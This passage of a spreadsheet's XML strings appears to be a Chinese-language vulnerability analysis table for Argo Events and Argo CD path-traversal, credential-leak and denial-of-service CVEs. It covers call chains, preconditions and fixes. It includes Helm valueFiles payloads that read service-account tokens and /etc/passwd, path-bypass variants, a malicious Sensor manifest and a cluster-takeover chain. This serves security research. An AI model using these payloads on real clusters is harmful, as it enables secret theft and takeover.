    <t>提权（路径遍历-&gt; 读取本来没有权限读取的文件）</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">直接注入
外部输入源： 文件引用
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>（ 攻击者需要提前将读取的文件替换成符号连接）</t>
    </r>
  </si>
  <si>
    <t>是
（可控制git仓库中的文件路径或者直接往git trigger source 配置中注入敏感文件路径）</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">a Git Trigger Source.filepath
Git Trigger Source: Git Trigger Source 是 Argo Events 中的一个自定义资源（Custom Resource），它定义在 Argo Events 的传感器（Sensor）资源中。
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>这个资源：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
是 Sensor CRD 的一部分
用于定义触发器的来源
指定如何从 Git 仓库获取工作流定义
包含了 Git 仓库的配置信息
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Sensor.[]triggers.Template.ArgoWorkflow .FilePath
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
示例：
apiVersion: argoproj.io/v1alpha1
kind: Sensor
metadata:
  name: webhook
spec:
  triggers:
    - template
        name: webhook-workflow-trigger.Source.Git.
        k8s:
          operation: create
          source:
            git:                                         # Git Trigger Source
              url: "git@github.com:example/repo.git"     # Git 仓库 URL
              cloneDirectory: "/git/example"             # 克隆目录
             </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> filePath: "workflow.yaml"                  # 工作流文件路径</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
              branch: "main"                            # 分支
              sshKeyPath: "/secret/ssh-key"             # SSH 密钥路径
</t>
    </r>
  </si>
  <si>
    <t>CRD-&gt; template</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">目录遍历
(g *GitArtifactReader).Read() API. Read()-&gt;
o (g *GitArtifactReader).readFromRepository()-&gt;
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>return ioutil.ReadFile(fmt.Sprintf("%s/%s", dir, g.artifact.FilePath))</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">是
</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>​
非典型控制器协调循环模式：
EDA ( 事件驱动响应为核心）
​</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>Sensor上下文初始化</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">：
go
sensorExecutionCtx := sensors.NewSensorContext(kubeClient, dynamicClient, ...)
组合了Kubernetes客户端、动态客户端和总线配置。
​事件处理循环：
sensorExecutionCtx.Start(ctx)启动协调循环，核心操作包括：
​监听EventBus：通过ebSubject订阅事件（网络I/O）
​条件判断：校验事件是否符合触发规则（CPU/内存计算）
​触发动作：通过dynamicClient创建Argo Workflow等资源（API写入）
​状态回写：更新Sensor资源的status字段（etcd写入）
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>环境变量读取：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>从环境变量获取配置信息，可能来自ConfigMap或Secret。
​Kubernetes API交互：通过kubeClient和dynamicClient进行资源的增删改查。
​事件总线通信：通过busConfig连接事件总线，进行消息的发布和订阅。
​日志和监控数据写入：记录日志和收集指标，涉及日志系统和监控存储。</t>
    </r>
  </si>
  <si>
    <t>关键操作本身不存在跨组件
-&gt; 存在接口
FetchArtifact-&gt; reader.Read() 
Read()是接口</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>调用深度: 10</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
func (sensorCtx *SensorContext) Start(ctx context.Context) error -&gt; func (sensorCtx *SensorContext) listenEvents-&gt; func (sensorCtx *SensorContext) triggerActions-&gt;func (sensorCtx *SensorContext) triggerWithRateLimi-&gt;func (sensorCtx *SensorContext) triggerOne-&gt;func (t *ArgoWorkflowTrigger) FetchResource-&gt;func FetchKubernetesResource (存在获取k8s 资源的操作）-&gt;func FetchArtifact(reader ArtifactReader)-&gt;(g *GitArtifactReader).Read() API. Read()-&gt; (g *GitArtifactReader).readFromRepository()-&gt;
</t>
    </r>
  </si>
  <si>
    <t>sensor 控制器（ 非典型资源控制器）</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>增加check</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
来源验证：在构造时验证路径
路径限制：禁止特定字符
符号链接检查：禁止使用符号链接
路径清理：使用 path.Clean 规范化路径</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">自定义验证函数：isSymbolLink
</t>
  </si>
  <si>
    <t>ADA-ARGO-SA-10: Denial of service from malicious trigger
parameters</t>
  </si>
  <si>
    <t>This issue was found and reported by the FuzzConstructPayload fuzzer that tests the
github.com/argoproj/argo-events/sensors/triggers.ConstructPayload() API. It
was found that a malicious TriggerParameter could make Argo Events consume more
memory than is available and crash the application with an out-of-memory panic.</t>
  </si>
  <si>
    <t>权限要求：
- 能够创建或修改 Trigger 资源
- 能够配置 TriggerParameter
环境要求：
- 运行 Argo Events
- 启用了触发器功能</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>攻击流程：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
1.攻击者创建/更新包含恶意参数的 Sensor 资源
# 创建恶意资源
kubectl apply -f malicious-sensor.yaml
# 或更新现有资源
kubectl patch sensor malicious-sensor --type merge -p '{"spec":{"triggers":[...]}}'
2.Argo Events 的控制器处理这个资源
3.ConstructPayload 函数处理 trigger parameters
4.导致内存耗尽，服务崩溃</t>
    </r>
  </si>
  <si>
    <t>TriggerParameter
---
涉及的资源是Sensor资源
apiVersion: argoproj.io/v1alpha1
kind: Sensor
metadata:
  name: malicious-sensor
spec:
  triggers:
    - template:
        name: malicious-trigger
        parameters:
          # 恶意参数配置
          - src:
              dependencyName: ""
              contextKey: ""
              contextTemplate: "-'"
              dataKey: ""
              dataTemplate: ""
              value: "*"
            # 超长重复字符串导致内存耗尽
            dest: "4444444444444444444444444444444444444444444444444444"
            operation: "4444444444444444444444444444444444444444444444444444"</t>
  </si>
  <si>
    <t>ConstructPayload 函数处理 trigger parameters</t>
  </si>
  <si>
    <t>不确定是否存在修复</t>
  </si>
  <si>
    <t>CVE-2020-1747</t>
  </si>
  <si>
    <t>第三方库组件PyYAML 库</t>
  </si>
  <si>
    <t>PyYAML library susceptible to arbitrary code execution when it processes untrusted YAML files. We do not believe Argo CD is affected by this vulnerability, because the impact of CVE-2020-1747 and CVE-2020-14343 is limited to usage of awscli. The awscli only used for AWS IAM authentication, and the endpoint is the AWS API.</t>
  </si>
  <si>
    <t>https://github.com/argoproj/argo-cd/issues/3748</t>
  </si>
  <si>
    <t>argo-cd(PyYaml)</t>
  </si>
  <si>
    <t>CVE-2020-14343</t>
  </si>
  <si>
    <t>https://github.com/argoproj/argo-cd/issues/5611</t>
  </si>
  <si>
    <t>CVE-2022-24348( 关键操作涉及了2层grpc调用-&gt; 数据流传递关系复杂）</t>
  </si>
  <si>
    <t xml:space="preserve">
具体工作流程：
a. Application Controller 检测到新的 Application CR
b. Controller 向 repo-server 发送清单生成请求
c. repo-server 的 GenerateManifest 服务接收请求
d. 内部调用 helmTemplate 处理 Helm chart
有详细的博客简介： https://apiiro.com/blog/malicious-kubernetes-helm-charts-can-be-used-to-steal-sensitive-information-from-argo-cd-deployments/
混合解析场景（如URL 和文件路径混合解析）
</t>
  </si>
  <si>
    <t>Argo CD before 2.1.9 and 2.2.x before 2.2.4 allows directory traversal related to Helm charts because of an error in helmTemplate in repository.go. For example, an attacker may be able to discover credentials stored in a YAML file.</t>
  </si>
  <si>
    <t>Affected versions
All versions</t>
  </si>
  <si>
    <t>Patched versions
2.3.0, 2.2.4, 2.1.9
https://github.com/argoproj/argo-cd/commit/02e61797b3ce407e3d4baa772a0863bba8cd2899</t>
  </si>
  <si>
    <t>https://github.com/argoproj/argo-cd/security/advisories/GHSA-63qx-x74g-jcr7</t>
  </si>
  <si>
    <t>1. ​Argo CD版本未修复
必须使用未修复路径遍历检查机制的版本（影响范围：v1.3.0至v2.3.0-rc3）。
修复版本（如v2.3.0-rc4+）通过强制所有valueFiles路径通过EnforceToCurrentRoot()校验，无论其是否为URI。
2. ​攻击者具备仓库写入权限
需能向Argo CD关联的Git仓库提交恶意Helm Chart，或直接修改已同步仓库的valueFiles字段。
写入权限可通过协作开发流程（如合并恶意PR）、被入侵的账户或过度宽松的RBAC策略获取。
3. ​使用Helm类型应用
漏洞触发点位于Helm Chart处理逻辑（helmTemplate函数），攻击需利用包含valueFiles字段的Helm应用。
Helm Chart需满足基础格式要求（如有效Chart.yaml），以通过Argo CD的初步校验。
4. ​路径混淆机制生效
url.ParseRequestURI()误判本地绝对路径为URI，例如：
yaml
helm:
  valueFiles:
    - /var/run/secrets/kubernetes.io/serviceaccount/token  # 被误判为URI
该路径需满足：
格式为绝对路径（以/开头）；
目标文件为有效YAML格式（否则解析失败）；
路径指向argocd-reposerver Pod内的敏感文件（如Kubernetes Secrets、其他应用配置）。
5. ​文件系统隔离不足
argocd-reposerver未启用强隔离机制（如每应用独立文件沙箱）；
敏感文件存储位置可预测（如默认挂载的Secret路径、其他应用的values.yaml）</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">https://apiiro.com/blog/malicious-kubernetes-helm-charts-can-be-used-to-steal-sensitive-information-from-argo-cd-deployments/
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> 1..敏感信息泄露</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
​目标文件：
Kubernetes Secrets（如/var/run/secrets/kubernetes.io/serviceaccount/token）；
其他应用的明文配置文件（如数据库凭证）；
系统敏感文件（如/etc/passwd）。
​攻击步骤：
提交包含恶意valueFiles路径的Helm Chart至仓库；
Argo CD同步时触发helmTemplate逻辑；
url.ParseRequestURI()误判路径为URI，跳过EnforceToCurrentRoot()检查；
读取目标文件内容并解析为YAML参数，通过Argo CD API或UI泄露。
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>2. ​横向移动与权限提升</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
​场景延伸：
窃取集群管理员Token，通过kubectl接管集群；
读取其他应用的values.yaml，获取数据库连接字符串等敏感信息；
利用泄露的SSH密钥访问内部系统。
​利用链示例：
mermaid
graph TD
    A[提交恶意Chart] --&gt; B[绕过路径检查]
    B --&gt; C[读取ServiceAccount Token]
    C --&gt; D[通过kubectl执行任意命令]
    D --&gt; E[部署恶意Pod或窃取数据]
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>3. ​供应链攻击</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
​污染公共Helm仓库：
攻击者上传包含恶意valueFiles的Chart至公共仓库（如Artifact Hub），诱导用户部署。
​后果：
所有使用该Chart的Argo CD实例自动同步后，敏感数据将泄露至攻击者控制的端点
</t>
    </r>
  </si>
  <si>
    <t>权限提升（路径遍历导致文件读）</t>
  </si>
  <si>
    <t>水平提权、垂直提权</t>
  </si>
  <si>
    <t>配置字段注入（helm chart)</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">apiVersion: argoproj.io/v1alpha1
kind: Application
spec:
  helm:
   </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> valueFiles:
      - /path/to/other/app/values.yaml  # 注入点
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
---
完整的攻击示例：
apiVersion: argoproj.io/v1alpha1
kind: Application
metadata:
 name: testApplication
 namespace: argocd
spec:
 destination:
   namespace: default
   server: https://kubernetes.default.svc
 project: default
 source:
  helm:
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">   valueFiles:
      - /path/to/other/app/values.yaml  # 注入点</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
  path: src
  repoURL:  https://github.com/[path_to_repo].git</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">存在验证
但存在以下2个问题：
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
1. URI解析逻辑与文件路径的混淆</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
路径解析逻辑中：url.ParseRequestURI() 函数被用于判断valueFiles输入是否为URI。根据其官方文档特性，该函数会将绝对路径格式的本地文件路径</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">（如/etc/passwd）误判为合法的HTTP请求URI,当攻击者构造形如/absolute/path/to/sensitive.yaml的路径时，该函数返回nil错误，导致代码分支跳过关键的EnforceToCurrentRoot()路径安全校验
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>2.文件隔离机制的失效</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">EnforceToCurrentRoot 逻辑缺陷
该函数本应强制路径位于repoRoot目录内，但其校验逻辑存在两个漏洞：
go
func isRequestedDirUnderCurrentRoot(currentRoot, requestedPath string) bool {
    return strings.HasPrefix(requestedPath, currentRoot)  // 仅简单前缀匹配
}
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">路径规范化不足：未正确处理../等相对路径符号，例如当currentRoot=/app时，攻击者可通过/app/../../etc/passwd绕过检查。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">绝对路径覆盖：当requestedPath为绝对路径时（如/etc/passwd），strings.HasPrefix校验会直接失败，但后续代码未对此类情况做拦截
</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">
存储到一个统一的数据结构： templateOpts中：后续再进行处理</t>
  </si>
  <si>
    <t xml:space="preserve">文件操作-&gt; 读操作
( URI 路径和文件路径混淆)
</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">经典控制器
​
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>CLI 命令的实现</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>（argocd app diff、sync、manifests 等命令属于 ​客户端工具链，其实现通常位于 Argo CD 的 cmd 包或独立的 CLI 模块中，而非控制器核心逻辑中。这些命令通过调用 Argo CD API 或直接操作 Kubernetes API 实现功能。）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">存在资源状态更新
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>控制器模式中：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
app.Status.SetConditions(conditions, map[appv1.ApplicationConditionType]bool{
  appv1.ApplicationConditionComparisonError:         true,
  appv1.ApplicationConditionSharedResourceWarning:   true,
  appv1.ApplicationConditionRepeatedResourceWarning: true,
  appv1.ApplicationConditionExcludedResourceWarning: true,
 })
</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>sink点涉及跨组件：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
Application Controller 
：processAppRefreshQueueItem(synchandler) -&gt;CompareAppState-&gt; targetObjs, manifestInfo, err = m.getRepoObjs(app, source, appLabelKey, revision, noCache, noRevisionCache, verifySignature, project)-&gt;
manifestInfo, err := repoClient.GenerateManifest
cli 命令行工具：
-&gt; Application Server( gRP请求）
MethodName: "GetManifests",
   Handler:    _ApplicationService_GetManifests_Handler,
以下调用相同
    → Repo Server (gRPC 请求)
 MethodName: "GenerateManifest",
            Handler:    _RepoServerService_GenerateManifest_Handler,
 func (s *Service) GenerateManifest-&gt;func (s *Service) runManifestGen-&gt; GenerateManifests-&gt;</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>helmTemplate（check的位置)</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">-&gt;     out, err := h.Template(templateOpts)-》 h.cmd.template(".", templateOpts)-&gt;c.run(args...)-&gt;
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>cmd := exec.Command(c.binaryName, args...)</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
(命令执行）</t>
    </r>
  </si>
  <si>
    <t>传播深度：8
1. 控制器入口
processAppRefreshQueueItem(synchandler) -&gt;CompareAppState-&gt; targetObjs, manifestInfo, err = m.getRepoObjs(app, source, appLabelKey, revision, noCache, noRevisionCache, verifySignature, project)-&gt;
manifestInfo, err := repoClient.GenerateManifest
2. 命令行入口
func NewApplicationDiffCommand(argocd app diff)/ NewApplicationSyncCommand(argocd app sync)/NewApplicationManifestsCommand (argocd app manifests)
-&gt;
res, err := appIf.GetManifests(context.Background(), &amp;q) -&gt; ApplicationService_GetManifests_Handler frunc  对应 func (s *Server) GetManifests(） -&gt;内部调用的是reposerver-client.GenerateManifest
后面的一致：
func _RepoServerService_GenerateManifest_Handler-&gt; func (s *Service) GenerateManifest-&gt;func (s *Service) runManifestGen-&gt; GenerateManifests-&gt;helmTemplate-&gt;     out, err := h.Template(templateOpts)  out, err := h.Template(templateOpts)-》 h.cmd.template(".", templateOpts)-&gt;c.run(args...)-&gt;
cmd := exec.Command(c.binaryName, args...)
(命令执行）</t>
  </si>
  <si>
    <t>控制器
a. Application Controller 检测到新的 Application CR
b. Controller 向 repo-server 发送清单生成请求
c. repo-server 的 GenerateManifest 服务接收请求
d. 内部调用 helmTemplate 处理 Helm chart
具体的check 在第三方组件上，非控制器上，控制器通过grpc 进行调用</t>
  </si>
  <si>
    <t xml:space="preserve">完善校验规则
</t>
  </si>
  <si>
    <t>repo-server 组件中（ 控制器）</t>
  </si>
  <si>
    <t>存在跨函数-&gt; 在参数被包装之前</t>
  </si>
  <si>
    <t>自定义校验函数</t>
  </si>
  <si>
    <t>CVE-2022-24731</t>
  </si>
  <si>
    <t>对CVE-2022-24348的绕过</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Argo CD starting with version 1.5.0 but before versions 2.1.11, 2.2.6, and 2.3.0 is vulnerable to a path traversal vulnerability, </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>allowing a malicious user with read/write access to leak sensitive files from Argo CD's repo-server. A malicious Argo CD user who has been granted `create` or `update` access to Applications can leak the contents of any text file on the repo-server. By crafting a malicious Helm chart and using it in an Application, the attacker can retrieve the sensitive file's contents either as part of the generated manifests or in an error message.</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> The attacker would have to know or guess the location of the target file. Sensitive files which could be leaked include files from another Application's source repositories or any secrets which have been mounted as files on the repo-server. This vulnerability is patched in Argo CD versions 2.1.11, 2.2.6, and 2.3.0. The problem can be mitigated by avoiding storing secrets in git, avoiding mounting secrets as files on the repo-server, avoiding decrypting secrets into files on the repo-server, and carefully limiting who can `create` or `update` Applications.</t>
    </r>
  </si>
  <si>
    <t>Affected versions
1.5.0 through 2.1.10, 2.2.5, 2.3.0-rc5</t>
  </si>
  <si>
    <t>Patched versions
2.1.11, 2.2.6, 2.3.0
https://github.com/argoproj/argo-cd/commit/b570ab8b1703eeca12c590e307632d3f66d013ba</t>
  </si>
  <si>
    <t>https://github.com/argoproj/argo-cd/security/advisories/GHSA-h6h5-6fmq-rh28</t>
  </si>
  <si>
    <t>路径解析困境：
代码通过 url.ParseRequestURI() 判断输入是否为 URL
但 /directory/values.yaml 这样的绝对路径也可以通过 URL 解析
导致绕过了 security.EnforceToCurrentRoot() 的路径限制检查
预测性路径：
repo-server 使用固定的文件结构
其他应用的 values.yaml 文件路径可以被预测</t>
  </si>
  <si>
    <t>1.URL 方案绕过：
valueFiles:
  - "file:///etc/passwd"  # URL 解析绕过
2. 路径遍历：
valueFiles:
  - "/../../etc/secrets"  # 绝对路径注入
3. 符号链接攻击：
valueFiles:
  - "symlink_to_secrets"  # 符号链接指向敏感文件</t>
  </si>
  <si>
    <t>apiVersion: argoproj.io/v1alpha1
kind: Application
spec:
  helm:
    valueFiles:
      - /path/to/other/app/values.yaml  # 注入点</t>
  </si>
  <si>
    <t>路径遍历</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>增加check</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
完善校验规则
</t>
    </r>
  </si>
  <si>
    <t>CVE-2023-25163</t>
  </si>
  <si>
    <t>这个漏洞是设置了非预期的资源配置字段才可触发漏洞的。</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. All versions of Argo CD starting with v2.6.0-rc1 </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">have an output sanitization bug which leaks repository access credentials in error messages. These error messages are visible to the user, and they are logged. The error message is visible when a user attempts to create or update an Application via the Argo CD API (and therefor the UI or CLI). </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>The user must have `applications, create` or `applications, update` RBAC access to reach the code which may produce the error. The user is not guaranteed to be able to trigger the error message. They may attempt to spam the API with requests to trigger a rate limit error from the upstream repository. If the user has `repositories, update` access, they may edit an existing repository to introduce a URL typo or otherwise force an error message. But if they have that level of access, they are probably intended to have access to the credentials anyway. A patch for this vulnerability has been released in version 2.6.1. Users are advised to upgrade. There are no known workarounds for this vulnerability.
- 在错误信息中泄露仓库访问凭证
- 这些错误信息对用户可见
- 错误信息会被记录到日志中</t>
    </r>
  </si>
  <si>
    <t>2.6.0-rc1 through 2.6.0</t>
  </si>
  <si>
    <t>2.6.1
https://github.com/argoproj/argo-cd/pull/12320/commits/200c3c156e9c27c6c5b197a5be28315e9b802b12</t>
  </si>
  <si>
    <t>https://github.com/argoproj/argo-cd/issues/12309
